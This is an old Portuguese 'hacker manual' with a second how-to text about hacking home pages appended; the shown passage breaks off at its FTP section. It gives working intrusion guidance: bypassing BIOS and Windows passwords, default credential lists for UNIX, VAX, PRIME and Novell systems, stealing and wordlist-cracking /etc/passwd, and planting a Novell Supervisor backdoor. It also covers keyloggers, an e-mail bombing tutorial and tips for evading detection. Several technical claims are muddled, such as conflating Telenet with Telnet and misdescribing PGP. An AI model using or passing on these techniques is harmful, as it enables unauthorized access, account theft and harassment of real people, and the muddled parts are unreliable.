Manual Hacker

                               Versão 1.0
                                    por
                               Wild Crash
 
 

                                  Aviso

     Em primeiro lugar: Eu não me responsabilizo pelo uso
                              indevido das
 informações, exemplos, descrições, enfim tudo o que estiver
                             contido aqui.
  TUDO o que você fizer com o material contido aqui sera de
                                  plena
      responsabilidade SUA. Tudo aqui contido é apenas de
   carácter EDUCATIVO.Repito, eu não me responsabilizo por
                         NADA que você fizer.

------------------------------------------------------------------

Índice

------------------------------------------------------------------

1. Introdução
1.1 Falta de informação
1.2 Vamos ao que interessa!
2. Definições
2.1 O que é um Hacker?
2.2 O que é Hacking?
2.3 Por quê hack?
2.4 A diferença entre Hackers e Crackers
2.5 Regras Hackers
2.6 Onde começar

3. Entendendo os sistemas
3.1 Telenet
3.2 Sistemas Operacionais
3.3 Definições

4. Vírus, Trojan Horses e Worms
4.1 Vírus
4.2 Trojan Horse (Cavalo de Tróia)
4.3 Worm

5. PGP

6. HACK (A melhor parte)

6.1 - HACK PC
6.1.1 Password do BIOS
6.1.2 Password do Windows
6.1.3 Password do screen saver do Windows
6.1.4 Proteção de documentos do Word
6.1.5 Proteção de arquivos ZIP
6.1.6 Proteção de arquivos ARJ
6.1.7 Copiando digitações ou macros de um micro
6.1.8 Um editor hexadecimal
6.1.9 Escondendo informações

6.2 - HACK MODEM
6.2.1 Encontrando o sistema
6.2.2 Sistemas UNIX
6.2.3 Sistemas VAX/VMS
6.2.4 Sistemas PRIME
6.2.5 Rede Novell
6.2.6 Passwords muito utilizados
6.2.7 E-mail

7. O Autor
7.1 Como contatar o Autor

8. Documentos utilizados na criação do Manual
 

----------------------------------------------------------------

1 - Introdução

----------------------------------------------------------------

1.1 - Falta de informação
Todos os textos que eu via na WEB ou em BBS's tinham uma
falta de in-
formação inacreditável. Na verdade, eu imagino que eles
sabiam e estavam re-
gulando informação (o que eu não concordo, as informações
devem ser comparti-
lhadas!), ou não sabiam porra nenhuma e só diziam as drogas
que viam em ou-
tras páginas.
Então, nesse manual, estou disponibilizando todas as
informações para
os Hackers novatos!
Obs.: Os lamers são bem vindos contanto que sejam
esforçados e queiram
aprender.

1.2 - Vamos ao que interessa!
Bom... agora vamos ao que interessa! Você encontrar nesse
manual, a-
quilo que você sempre quis saber e ninguém te dizia. As
fórmulas milagrosas
para invadir sistemas, enfim... TUDO! Faça bom proveito!
 

----------------------------------------------------------------

2 - Definições

----------------------------------------------------------------
 

2.1 - O que é um Hacker
Tudo isto que vocês pensam dos Hackers foi criado
possivelmente com a
publicidade gerada pelos filmes que tratam do assunto,
como: Jogos de Guerra
e agora com os mais recentes A rede e Hackers.
São aqueles possuem muitos, senão todos, os conhecimentos
acima - isso
não é uma regra, mas não usam para os mesmos propósitos e
as vezes auxiliam
os próprios técnicos em segurança e os webmasters a
proteger seus sistemas.
São de uma inteligência e determinação muito superiores a
de uma pes-
soas comuns, pois eles são capazes de passarem semanas ou
até mesmo meses
lendo e aprendendo de um novo sistema, apenas com o
propósito de saber e uti-
lizar esses sistemas.
Um Hacker, é um sabichão. Justamente por saber muito, ele
tem condições
de "aprontar" por ai. O Hacker sempre quer aprender mais um
pouco e normal-
mente acaba perdendo horas de sono por isso. É aquele que
tem prazer em sen-
tar em frente de seu micro e ficar horas e horas buscando
nem sabe o quê.
Naturalmente xereto, o Hacker adora invadir sistemas
alheios para sim-
plesmente preencher seu ego. Muitas de suas façanhas podem
ser discutiveis ao
nível social, mas o verdadeiro Hacker não costuma estragar
nada, subtrair
programas, ou sequer roubar informações em detrimento de
outrem.
O Hacker é, acima de tudo, um intelectual informatizado.

2.2 - O que é Hacking?
Hacking é o ato de penetrar em sistemas de computadores
para ganhar ma-
is conhecimento e entender como é seu funcionamento. Em
português hack signi-
fica corte, entalhe.

2.3 - Por quê hack?
Como já foi dito anteriormente, o hack é feito para a
aprimorar os co-
nhecimentos de uma pessoa em relação a um sistema de
computadores. Hackers
não destrõem, não roubam e nem espionam informações por
dinheiro.

2.4 - A diferença entre Hackers e Crackers<
Os Crackers são os que a imprensa confunde com os hackers,
são aqueles
que invadem sistemas com o propósito de roubar programas ou
simplesmente apa-
gá-los, são inteligentes, porém, em sua maioria,
prepotentes, pois deixam men-
sagens do tipo: "Eu sou o melhor ! / Apaguei e escapei
!"entre outras, dei-
xando na maioria das vezes um rastro que possibilita sua
captura. Possuem co-
nhecimentos semelhantes aos phreaks mais com propósitos um
pouco mais destru-
tivos.
Um exemplo recente foi a prisão de Kevin Mitnick, o "ladrão
K(?) ciber-
nético mais procurado da história, capturado pelo FBI com a
ajuda do Tsutomu
Shimomura, o técnico de segurança mais respeitado da
história (?).
Um Cracker é o que utiliza de suas habilidades em proveito
próprio, não
importando quantos ou quais prejuízos cause. Este é um
elemento perigoso, que
muitas vezes acaba por se auto-destruir. Normalmente coloca
vírus em computa-
dores, descobre senhas para vender a empresas, destrói
informações, corrompe
sistemas e apronta tudo que pode.

2.5 - Regras Hackers
1- Nunca destruir nenhum sistema.
2- Nunca alterar nenhum dos arquivos do sistema, a não ser
que seja necesá-
rio para esconder a sua presença ou garantir a sua entrada
posteriormente.
3- Não compartilhe com ninguém seus projetos hackers, com
ninguém
4- Em uma BBS, não é aconselhável que você discuta seus
projetos hackers.
BBS's podem ser monitoradas pelo governo.
5- Nunca dê nomes ou telefones reais em uma BBS.
6- Nunca deixe seu apelido em um sistema que você entrou.
7- NãO entre em computadores governamentais.
8- Nunca converse sobre seus planos hackers com outra
pessoa do telefone de
sua casa.
9- Seja atento. Mantenha todo o seu material hacker em um
lugar seguro.
10- Para se tornar um verdadeiro hacker você deve
simplesmente praticar.
2.6 - Onde começar
Começe com sistemas pequenos como em universidades ou
escritórios. De-
pois passe para redes maiores como telenet. A telenet é
altamente recomendada
para novatos, pois ela tem um sistema de segurança muito
vago. São milhares
de conexões ao mesmo tempo, o que torna praticamente
impossível a monitoração
de um usuário (você).

----------------------------------------------------------------

Entendendo os Sistemas

----------------------------------------------------------------
 
 

3.1 - Telenet
Telenet ou simplesmente Telnet, ‚ um sistema de
interligação de compu-
tadores. Telnet é a internet das BBS's. São vários
computadores, com seu sis-
tema operacional próprio, associados próprios e arquivos
próprios se interli-
gando e compartilhando informações.
Abaixo, se encontra uma lista com os principais comando da
Telnet:

-----------------------------------------------------------------------------

@ - command prompt
------------------------------------------------------------------------------
? - comando errado
------------------------------------------------------------------------------
Access Bared - A sua conexão não permite esse acesso
------------------------------------------------------------------------------
Access to This Address not permitted - Seu Nui não é
autorizado a acessar es-
se endereço
------------------------------------------------------------------------------
Attempt Aborted - Desconectando do sistema
------------------------------------------------------------------------------
Busy - Todas as portas e destinos estão sendo usados
------------------------------------------------------------------------------
Collect Wats Call Not Permitted - Collect Wats calls não
são permitidos pelo
seu host o pelo Nui
------------------------------------------------------------------------------
Connected - Conectado
------------------------------------------------------------------------------
Connection From - Seu terminal recebeu uma chamada
------------------------------------------------------------------------------
Connection Pending - O sistema está se conectando com o Nua
(digite d bye pa-
ra desconectar de imediato)
------------------------------------------------------------------------------
Disconnected - Seu terminal foi desconectado pelo que você
ligou
------------------------------------------------------------------------------
Enhanced Network Services System Error - Sua chamada não
pode ser validada
------------------------------------------------------------------------------
Enhanced Network services unavailable at this time -
Serviço temporariamente
desligado
------------------------------------------------------------------------------
Illegal Address - o endereço que você netrou é inválido
------------------------------------------------------------------------------
Invalid Charge Request - sua seleção de pagamento é
inválida
------------------------------------------------------------------------------
Invalid User Id or Password - O Nui que você digitou é
inválido
------------------------------------------------------------------------------
Local Congestion - Seu número de acesso local esta ocupado
------------------------------------------------------------------------------
Local Disconnect - Seu terminal foi desconectado
------------------------------------------------------------------------------
Local Network Outage - Um problema temporario esta o
afastando da network
------------------------------------------------------------------------------
Local Procedure Error - Problemas na comunicação forçaram a
network limpar a
sua conexão
------------------------------------------------------------------------------
Not Available,Not Operating,Not Responding - O computador
não pode aceitar o
seu pedido
------------------------------------------------------------------------------
Not Connected - Voce entrou com um comando que só funciona
conectado ao sis-
tema certo
------------------------------------------------------------------------------
Not Reachable - Uma condição temporária deixou voce sem
acesso a network.
------------------------------------------------------------------------------
Password - É o prompt que aparece quando voce entra na Nui
------------------------------------------------------------------------------
*** Possible Data Loss - conexão resetada
------------------------------------------------------------------------------
Refused Collect Connection - O sistema pago selecionado,
precisa ser pago an-
tes da liberação
------------------------------------------------------------------------------
Rejecting - O host não aceitou a chamada
------------------------------------------------------------------------------
Remote Procedure Error - Problemas de comunicação, forçaram
a network derru-
bá-lo
------------------------------------------------------------------------------
Still Connected - Voce se conectou em dois serviços ao
mesmo tempo
------------------------------------------------------------------------------
Telenet XXX XXX - A porta que voce esta usando
------------------------------------------------------------------------------
Terminal - terminal prompt
------------------------------------------------------------------------------
Unable to validate call - Seu Nui foi temporariamente
desligado
------------------------------------------------------------------------------
Unable to validate call contact admin - The Nui has been
permently disabled
Unknown Adress - Seu Nua deve ser in-
válido
------------------------------------------------------------------------------
Wats Call not permitted - Telenet In-wats calls não são
permitidas pelo seu
host ou Nua
 
 
 

3.2 - Sistemas Operacionais
Existem v rios tipos de sistemas operacionais hoje em dia.
Os mais co-
nhecidos são o UNIX, o VAX's, o PRIME e a rede Novell. Os
textos sobre como
entrar nesses sistemas estão na seção 6.2 - HACK MODEM. O
remote Access tam-
bém é bem conhecido, mas é mais usado em programas
específicos ou em BBS's.
3.3 - Definições
Access Number - O numero que voce disca para acessar
diretamente a network
(duh).
Nua (Network Users Address) - Nua é, basicamente, um número
que voce disca
para acessar um serviço particular qualquer. Dentro do
sistema voce pode usar
os recursos internos, ou pode acessar um Nua com um serviço
específico para
cada numero.
Nui (Network User Identification) - Nui é uma conta com
password da network,
como nas BBS só que aqui voce pode desfrutar de vários
serviços e sistemas
diferentes.
DNIC (Data Network Identification Code) - DNIC é um código
de 4 digitos. Pen-
se que o DNIC é o prefixo e o Nua é seu número de telefone
telefone.
Outdial - Outdial é um modem conectado a network que,
ligado a ele, voce pode
fazer chamadas para fora da network como um telefone
pessoal etc...

----------------------------------------------------------------

4 - Virus, Trojan Horses e Worms

----------------------------------------------------------------

4.1 - Virus
Virus é um programa independente que se auto reproduz. Ele
ir se aclo-
par em outros programas e fazer cópias de si mesmo
espalhando-se pelo win-
chester. O intuito do virus é destruir o corruptar
informações do disco rigi-
do ou baixar o rendimento do micro rodando programas
maiores que a memória
disponível. Antivirus, só retiram os vírus que eles forem
programados. Nenhum
programa pode o proteger 100 % de vírus, pois a cada
momento estão sendo fa-
bricados novos vírus em qualquer parte do mundo.

4.2 Trojan Horse (Cavalo de Tróia)
O cavalo de tróia é um programa que, como o vírus, se
aclopa em um ar-
quivo do winchester de um microcompurador infectado. Eles
tem o intuito de
roubar informações preciosas como passwords ou logins e,
depois, enviá-las a
seu "dono"pela network automaticamente. Alguns antivírus
retiram os Trojans
outros não, mas nenhum retira todos.

4.3 Worm
Worm é o tipo de programa mais inteligente já criado. Ele
não só se es-
palha pelo computador e espera pela sorte de infectar outro
atravéz de um
disquete contaminado, ele tem o poder de se espalhar por
toda a network. Os
worms podem infectar toda uma rede de sistemas e fazer
nelas um bom estrago.

-----------------------------------------------------------------

5 - PGP

-----------------------------------------------------------------

PGP ou Pretty Good Privacy é um programa de computador que
encripta e
decripta informações. Voce pode mandar e-mails ou até
arquivos encriptados
para uma pessoa que, com o mesmo PGP que você usou para
encriptar, pode de-
criptar as informações e usá-las sem correr o risco de
outra pessoa intercep-
tá-la.
O PGP somente funciona quando é utilizada uma PUBLIC KEY.
Tanto o des-
tinat rio quanto o remetente precisam ter o mesmo PGP key,
pois é com ele que
as informações são enctiptadas e decriptadas pelo seu
programa.

-----------------------------------------------------------------

6 - Hack ( a melhor parte)

-----------------------------------------------------------------

Essa sessão é dividida em duas partes: 1- HACK PC; 2- HACK
MODEM.
Obs.: Na maior parte das explicaçoes abaixo são necessários
VáRIOS
programas. Todos eles estao disponiveis na Fou HomePage (O
endereço está no
fim do Manual.

-----------------------------------------------------------------

6.1 - Hack PC

-----------------------------------------------------------------

6.1.1 Password do BIOS
Para quebrar o password do BIOS você pode encontrar duas
situações:
1- Se você pegar o computador depois que o password foi
passado corretamente,
use um desses programas:
amipsw.com (230b)
ami.com (555b)
aw.com (1,83k)
amidecod.com (1,79k)
2- Se você pegar o computador desligado ou esquecer o
password:
- Ligue o micro e entre o setup;
- Anote TODOS os dados em um papel;
> - Desligue e abra a CPU;
- Ache uma bateria na motherboard e rettire-a;
- Espere uns 20 minutos e recoloque a bbateria;
- Ligue o micro novamente e entre no seetup;
- Re-configure todos os dados que você anotou.
_________________________________________________________________

6.1.2 Password do Windows
Para quebrar o password do Windows 3.x voce deve
digitar"ctrl+alt+del"e
depois "enter"quando aparecer a caixa de verificação.
Depois que voce passou
o password, edite o arquivo win.ini e apague as linhas
"load="e "run=".

Para quebrar o password no WIN95:
1 - Se a caixa de verificação que aparecer for Password
Logon, simples-
mente clique em cancel que o sistema vai entrar.
2 - Se a caixa de verificação for Windows Password, digite
"ctrl+alt+del", escolha a janela do password na lista que
aparecer e clique
em "End Task". Com o password passado, edite o arquivo
win.ini e apague as
linhas "load="e "run=".

_________________________________________________________________

6.1.3 Password do screen saver do Windows
Para retirar o password de Screen Saver do Windows 3.x voce
deve editar
o arquivo control.ini, apagando tudo o que tiver na area do
password.
Para retirar o password do Screen Saver do WIN95, renomeie
todos os ar-
quivos de extensão .pwl do diret¢rio do windows. Anote os
nomes alterados em
um papel para eventuais problemas.

Para desligar o screen saver sem ter o password no win 3.1
(ainda não
foi testado no 3.11 ou no WIN95), aperte ctrl+alt+del e
enter várias vezes
que o screen saver ‚ fechado.
________________________________________________________________

6.1.4 Proteção de documentos do Word
Para retirar a proteção dos documentos do word use esse
programa:
wfwcd.zip (19,8k)
________________________________________________________________

6.1.5 Proteção de arquivos ZIP
Para quebrar o password de arquivos ZIP use esse programa:
zipcrack.zip (12,3k)
________________________________________________________________

6.1.6 Proteção de arquivos ARJ
Para quebrar o password de arquivos ARJ use esse programa:
brkarj10.zip (13,1k)
________________________________________________________________

6.1.7 Copiando digitações ou macros de um micro
Para copiar teclas digitadas de um micro como passwords ou
logins use
um desses programas:
keycopy.zip - DOS - (3,31k)
keytrap.zip - WIN95 - (36,0k)
_________________________________________________________________

6.1.8 Um editor hexadecimal
Para quebrar alguns pogramas, passwords ou códigos de
entrada, é bom
que voce tenha em mãos um bom programa editor de
hexadecimal. Ele também é
utilizado para remover os numeros seriais de programas como
ACDSee 9.0 e
etc...
Hex Workshop 32bits (375k)
_________________________________________________________________

6.1.9 Escondendo informações
Para esconder informações ou até pequenos arquivos em
arquivos de ima-
gem do tipo .GIF (Compuserve), use esse programa:
Hide and Seek v. 4.1 (82,5k)

-----------------------------------------------------------------

6.2 - Hack Modem

-----------------------------------------------------------------

6.2.1 Encontrando o sistema
Para encontrar um computador com o sistema, voce deve
procurar pelas
linhas com um programa chamado War Dialer, ou se conectar
via Telenet ou ou-
tro sistema de interligação de computadores.
War Dialer: VMB Hacker (40,7k)
_________________________________________________________________

6.2.2 Sistemas UNIX
1. Entrando no sistema - Para entrar no sistema, você deve
entrar com um "lo-
gin", que pode ter de 1 a 8 dígitos e um password que pode
ter de 6 a 8 dígi-
tos. Dai voce tem tres saídas:
1. Arrumar a lista de passwords com um hacker
2. Tentar entrar com os defaults
3. Ver quem est on-line com os comandos: who, rwho, finger;
e tentar en-
trar com seus logins mais tarde.
Defaults são logins e passwords que já vem com o sistema.
Eles ficam residen-
tes até que o sysop o desliguem, então voce pode dar a
sorte de encontrar um
esquecido. Veja lista abaixo.

Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
----------------------------------------------------------------

2. Dentro do sistema: Dentro do sistema, a primeira coisa
que voce deve fazer
é copiar o arquivo da lista de passwords. Ele se est em:
/etc/passwd. Nesse
arquivo, voce vai encontrar as informações na seguinte
sintaxe:
username:password:UserID:GroupID:descrição ou
nome:homedir:shell
Ex.: fou:234abc56:7148:34:Fausto
Morais:/home/dir/fou:/bin/fou
Username: fou
Encrypted Password: 234abc56
User Number: 7148
Group Number: 34
Other Information: Fausto Morais
Home Directory: /home/dir/fou
Shell: /bin/fou
Esse arquivo muito prov velmente estar encriptado. O
password estar escon-
dido e, sem um programa para decript -la, a lista ser
in£til. O programa de
decripta‡Æo do password UNIX, trabalha em cima de um dicion
rio pr‚ moldado,
comparando as palavras com o texto encriptado. ? bom
lembrar que o Brute For-
ce nÆo ir decriptar a lista. Ele ir tentar comparar
palavras encriptadas
por uma lista de nomes com a lista de passwords. Quando ele
encontrar seme-
lhanças (ex. duas palavras igusia com a mesma decriptacao)
ele para e d a
lista pronta.

Brute Force (14,4k)
Dictionary Maker (7,73k)
Antes de usar o programa decriptador que nao d certeza de
sucesso,
tente encontrar um login sem password pois assim, voce só
precisar digitar o
login para entrar no sistema. Ex.:
fou::7148:34:Fausto Morais:/home/dir/fou:/bin/fou
Depois da lista de passwords, pegue os seguintes arquivos:
/etc/group - é a lista de newsgroups e seus passwords
tambem encriptados.
sintaxe - groupname:password:group id:users in group
/etc/hosts - é a lista de hosts conectados ao sistemas.
étil quando a co-
nexão é via telenet ou rlogin.
/usr/mail/<user name> - é onde estÆo guardadas as mensagens
de cada usu -
rio.
_______________________________________________________________

6.2.3 Sistemas VAX/VMS
Para entrar no sistema VAX/VMS, voce deve proceder da mesma
maneira que
fez no UNIX: Arrume a lista de passwords, entre com o login
de alguem ou ten-
te os defaults.

Username: Password:
system operator
system manager
system system
system syslib
operator operator
systets uetp
systest systest
systest test
sysmaint sysmaint
sysmaint service
sysmaint digital
field field
field service
guest guest
guest sem password
demo demo
demo sem password
test test
decnet decnet
----------------------------------------------------------------

Dentro do sistema não há muito o que fazer. Voce pode
tentar pegar a
lista de passwords em: SYS$SYSTEM:SYSUAF.DAT, mas
normalmente, ela nao esta
disponivel para os usu rios
Tome muito cuidado quando tentar quebrar o sistema VAX's,
pois ele
guarda todos os bad logins e bad passwords, podendo rastre
-lo na sua pr¢xima
tentativa. Se voce quiser mesmo tentar, entre com alguns
passwords em um dia,
espere e tente novamente no dia seguinte...
_______________________________________________________________

6.2.4 Sistemas PRIME
Para entrar no sistema PRIME voce dever fazer as mesmas
coisas que fez
no UNIX e no VAX's.

Username: Password:
prime prime
primos primos
primos prime
primos_cs prime
primos_cs primos
primenet primenet
system system
system prime
system primos
netlink netlink
test test
guest guest
guest1 guest
________________________________________________________________

6.2.5 Rede Novell
1. Entrando no Sistema - Para quebrar a rede Novell voce
deve utilizar
os mesmos recursos que usou para entrar nos sistemas UNIX
ou VAX's. Na Novell
voce tambem pode tentar alguns defaults. Os defaults da
rede Novell sao usa-
dos para a conexÆo com portas externas como impressoras,
fax e etc..., todos
sem password. Abaixo estÆo alguns defaults:

Login:
superisor
guest
admin
user_template
print
laser
hp_laser
printer
laserwriter
post
mail
gateway
gate
router
backup
wangtek
fax
faxuser
faxworks
test
archivist
chey_archsvr
windows_passthru
-----------------------------------------------------------------

Se voce conseguir entrar com esses defaults, voce pode
conseguir a lis-
ta com os logins verdadeiros fazendo o seguinte: v ao
diret¢rio SYS:PUBLIC,
digite SYSCON e de enter. Entao v a User Information e veja
a lista com to-
dos os logins desse servidor. Esses logins só poderao ser
utilizados se esti-
verem sem password, pois a lista s¢ mostra os nomes. Nunca
tente chutar o
password de um usu rio, pois o computador armazena o numero
de vezes que uma
senha foi digitada errada e manda para o usu rio verdadeiro
quando ele se co-
necta. Esse sistema de segurança se chama Intruder
Detection.
Se voce nao conseguir entrar com esses logins, faça o
seguinte: no
prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e
escreva CX /T /A
/R. Com isso voce, provavelmente conseguir a lista dos usu
rios.
2. Conseguindo Supe Acess - Para conseguir um acesso
Supervisor, que ‚
muito importante para fazer uma backdoor ou utilizar outros
recursos use esse
programa:
nw-hack.zip (25,8k)

Os problemas de usar o nw-hack sao os seguintes: O password
Supervisor
é mudado para SUPER_HACKER; Todas as contas no servidor tem
acesso Supervi-
sor; o administrador do sistema logo saber que voce entrou
na rede e acabar
com os previlegios do acesso Supervisor mudando tambem seu
password. A £nica
coisa que voce pode fazer é deixar uma backdoor ou "porta
dos fundos".
3. Deixando uma Porta dos Fundos - Uma porta dos fundos com
previlegios
de acesso Supervisor é como uma assinatura gr tis. Para
fazer isso, voce deve
utilizar o seguinte programa:
super.zip (31,3k)
Esse programa foi escrito exatamente para deixar o usu rio
desligar e
ligar o acesso Supervisor na hora que quiser. Faça então o
seguinte:
- Consiga aceso Supervisor com o nw-haccker;
- Ligue sua conta para supe equivalencyy com o super.exe;
- Se voce ganhar acesso Supervisor, de supe equivalency a
algum dos de-
faults (Guest, test, archivist, chey_archsvr...);
- Saia e entre na rede com o default quue voce deu a supe
equivalency e
ligue o acesso Supervisor com o super.exe;
- Saia e entre novamente com o login quue voce utilizou
primeiro;
- Remova o acesso Supervisor.
Agora o default que voce escolheu pode ser ligado e
desligado por voce,
na hora que voce quiser para ter acesso Supervisor.
________________________________________________________________

6.2.6 Passwords muito utilizados
Se nÆo houver outro jeito e voce precisar chutar os
passwords, chute
com inteligência e não v começando: aaa, aab, aac, aad ...
Os passwords mais
utilizados aqui no Brasil são:
- Times de futebol;
- Telefone;
- Sobrenome;
- Nome de computadores (pentium, ibm, eetc são encontrados
com frequên-
cia);
- Apelidos;
- Nome de pessoas famosas;
- Passwords de teclas seguidas. Ex.: qwwerty, asdfgh, zxcvbn
ou aaa,
bbb, ccc. O usuário que usa desse tipo de password não
pensa em
hackers quebrando sua senha e sim na velocidade para dar
login.
Por isso, quando você escolher seu password, faça uma
mesclagem de le-
tras e números. Ex. mouse/1997 - m1o9u9s7e. Parece óbvio,
mas ninguém vai
chutar um password desse tipo quando tentar quebrar seu
login.
________________________________________________________________

6.2.7 E-mail
Nesta sessão voce encontrar arquivos para enviar e-mails
bombs, e-mail
sem remetente e os famosos PGPs.
Unabomb (59,9k) Para bombear o e-mail de alguém.
Upyours 3.0 (+-2Mb) O melhor programa de e-mail bomb
Anonimail (71,3k) Para enviar e-mails anônimos
AEgis Shell for PGP (2,6Mb) Um dos melhores programas de
encripta-
ção

Se você quiser enviar um E-Mail para Usenet, mande a
mensagem para
<NEWSGROUP>@<SERVERNAME>, por exemplo.
Grupo: fou.morais
Gateway: news.demon.co.uk
Endereço: [email protected]
Abaixo est uma lista com alguns gateways:

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
-------------------------------------------------------------------------

Unabomber
Devido ao grande número de pedidos de ajuda no uso do
Unabomber, aqui
vai um tutorial completo sobre o programa.
INSTALAÇÃO: Descompacte o arquivo em um diretório qualquer.
Copie o
arquivo iport.vbx para o system do Windows, arrume (faça
download na Inter-
net) um vbrun300.dll e copie tambem para o system.
USO: Rode o programa, na área "Mail Server" escreva o
servidor que vo-
ce usa para mandar E-Mails. (Veja isso na configuração do
seu programa de
mensagens) Escreva entÆo o endereçoo da vítima em "To", o
endereço que você
quer ter em "From", e sua mensagem como você escreve
normalmente. A rea
"Apparent Server", ‚ o servidor que vai aparecer como
remetente na mensagem
que você enviar.

OBS: O remetente na mensagem estar escondido para pessoas
comuns. Ha-
ckers, programadores ou qualquer especialista poder
descobrir o endereço do
idiota que o bombeou. NÃO VACILE... Este programa serve
para ser usado com
lammers, portanto bombeie lammers.

-------------------------------------------------------------------------

  A CASUCA DESIGNER não se responsabiliza pelo uso das informações aqui colocadas se você fizer algo errado problema seu, não vai dizer que aprendeu na minha HP, divulgação eu quero problema não...

>>COMO SE TORNAR UM HACKER<<  

Não existe nenhum livro ou material específico em como ser tornar um hacker. Não existe uma fórmula mágica e nem como se tornar um hacker do dia para a noite. Um hacker se faz após anos de muita leitura e estudo. Basicamente toda a informação que você necessita para se tornar um hacker já está disponível na rede, o que você tem que fazer é vasculhar e achar as informações. Está certo que isto não é uma tarefa muito fácil, mas quem disse que ser um hacker é fácil?

Qualquer um pode ser um hacker ou médico ou engenheiro ou etc. Desde que você se informe e estude.

Para você que algum dia pensa em ser um hacker aqui estão algumas dicas no que você deve concentrar seus esforços e começar a aprender:

Conheça a fundo um sistema operacional como o Windows 95, Unix, Windows NT ou MacOS. Com ele é que você ira entender como quebrar a segurança ou então como funciona a segurança, no caso do Windows NT que possui certificado C2 de nível de segurança, é mais difícil, mas não impossível.

Aprenda uma linguagem de programação como VisualBasic (específica para a plataforma Intel) ou C (para qualquer plataforma). Você escrevendo pequenos programinhas pode deixar um programa rodando em paralelo para descobrir a senha de acesso.

Aprenda a usar o comando TELNET do Unix para se logar em máquinas remotamente e copiar aquele programa oculto que falta para você entrar no sistema ou então cadastrar um usuário fantasma para entrar no sistema.

Aprenda como funcionam as redes e quais são os tipos de redes existente. Hoje em dia, a maioria dos computadores estão interligados e você conhecendo as arquiteturas e protocolos utilizados facilita bastante o acesso.

Aprenda o protocolo TCP/IP, o protocolo que é usado hoje em dia na Internet. Isto se você quiser ser um hacker da net.

E depois de fazer isso, aconselho que você leia uns bons livros sobre invasão e quebras de senha, que podem ter seus títulos encontrados aqui mesmo na net, e depois disso quem sabe você não seja um verdadeiro hacker!!!

>>HACKEANDO HOME PAGES<<

1-INTRODUÇÃO :

O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções : Precauções-cuidados que você deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o método phf Home page grátis-como hackear servidores de home page grátis Home page grátis 2-Outro método de como hackear servidores de home pages grátis Já cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits Já cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor.

2-PRECAUÇÕES:

Nesse texto vou ensinar deversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc...

3-SOBRE AS SENHAS :

A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix). Uma senha encryptada é mais ou menos assim :

root:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom

Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy

Bob:/usr/people/bbob:/bin/csh

Agora o exemplo de uma senha com shadow :

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/

usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW

Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper

Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.

4-DESENCRYPTANDO :

Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada.

Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt

E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.

5-FTP

